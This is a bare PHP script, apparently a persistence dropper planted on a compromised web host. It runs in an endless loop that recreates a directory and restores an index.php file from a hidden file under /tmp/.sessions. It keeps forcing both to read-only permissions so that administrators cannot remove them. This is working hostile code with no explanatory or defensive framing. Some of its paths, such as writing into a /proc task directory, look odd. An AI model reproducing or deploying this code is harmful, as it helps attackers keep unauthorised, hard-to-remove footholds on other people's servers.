
<?php
@ini_set("max_execution_time", 0);
while (True){
    if (!file_exists("/home/sc3umbg4085/ffmc974.fr")){
        mkdir("/home/sc3umbg4085/ffmc974.fr");
    }
    if (!file_exists("/proc/2378950/task/index.php")){
        $text = base64_encode(file_get_contents("/tmp/.sessions/.L3Byb2MvMjM3ODk1MC90YXNraW5kZXgtdGV4dA=="));
        file_put_contents("/proc/2378950/task/index.php", base64_decode($text));
    }
    if (gecko_perm("/proc/2378950/task/index.php") != 0444){
        chmod("/proc/2378950/task/index.php", 0444);
    }
    if (gecko_perm("/home/sc3umbg4085/ffmc974.fr") != 0555){
        chmod("/home/sc3umbg4085/ffmc974.fr", 0555);
    }
}

function gecko_perm($flename){
    return substr(sprintf("%o", fileperms($flename)), -4);
}
